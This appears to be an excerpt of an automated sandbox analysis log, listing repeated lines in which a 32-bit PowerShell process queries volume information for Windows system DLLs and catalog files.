Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
